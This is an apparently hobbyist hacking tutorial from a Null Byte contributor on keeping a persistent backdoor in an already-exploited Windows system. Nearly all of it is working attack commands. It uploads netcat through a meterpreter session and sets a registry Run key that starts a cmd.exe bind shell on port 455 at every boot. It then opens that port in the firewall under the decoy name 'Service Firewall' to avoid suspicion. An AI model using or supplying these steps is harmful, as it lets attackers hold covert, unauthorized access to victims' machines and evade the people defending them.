How to Install a Persistant Backdoor in Windows Using Netcat

Imagine this scenario: You exploited a system using metasploit and you want to install a backdoor. You have a few options;

1. Use the meterpreter persistence command.
2. Use the meterpreter metsvc command.
3. Use netcat to listen on a port continuously.

You have already tried option 1 and 2 and they failed... You have one more chance to install a backdoor and netcat is the way to go...

Note: This article requires you to already have an exploited windows system with a meterpreter session. Check out some of OTW's tutorials on exploiting with metasploit. Also, this is more of an advanced topic as we're working with the Windows registry.

Step 1: Upload a Copy of Netcat to the Exploited System

For these commands to work, both systems need netcat. For Kali Linux, everything needed is pre-installed, but Netcat for windows is harder to find. I use the 32-bit version from this website and it works flawlessly.

After the windows download is complete, unzip the files in your /usr/share directory:

• mv netcat-win32-1.11.zip /usr/share
• cd /usr/share
• unzip netcat-win32-1.11.zip

Now in the meterpreter session, execute the following command:

• upload /usr/share/netcat-1.11/nc.exe C:\\windows\\system32

This will upload netcat to C:\windows\system32\nc.exe on the windows machine.

Step 2: Edit the Registry to Start Netcat on Startup

Before we continue, I suggest you create a backup of your registry just in case anything goes wrong.

The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. (From: Windows Registry wikipedia page.

Basically, any program or software that needs configuration is stored in the Windows registry. This includes the autorun feature which we will be using to start netcat each time the system boots.

First, run the following command in the meterpreter session:

• reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

This command prints all the values of the specified path to the screen. Now, we are going to add our netcat executable we uploaded earlier to listen for connection on port 455 each startup. We do that with the following commands:

• reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe'
• reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

Step 3: Open Port 455 in Firewall to Allow Connections Through

What good is a backdoor if we can't connect back to it? We need to open port 455 in the firewall to let us connect to it when we want to. The next few commands require a shell, so in the meterpreter session, type the following:

• shell

This will open a windows command prompt in your meterpreter session. In the shell command prompt, we will open port 455 in the firewall and name the service of the port "Service Firewall" to try and take some suspision out of it...

• netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Step 4: Connect to Backdoor

If everything goes well, we should be able to connect to the system from port 455. So now, reboot the target system and try to connect using the following command:

• nc -v [IP ADDRESS] 455

As we can see here, netcat responded and connected us through port 455. We can now connect to this machine when ever we like with out having to exploit it over and over again!

A Note from JINX:

Null Byte is a wonderful community of respectful hackers. I would not have gotten this far with hacking/scripting if it weren't for this site and the contributers such as OccupyTheWeb, ghost_, Cracker Hacker and the list goes on and on. This is my first how-to so please give comments, suggestions and correct me if I made a mistake that I didn't catch!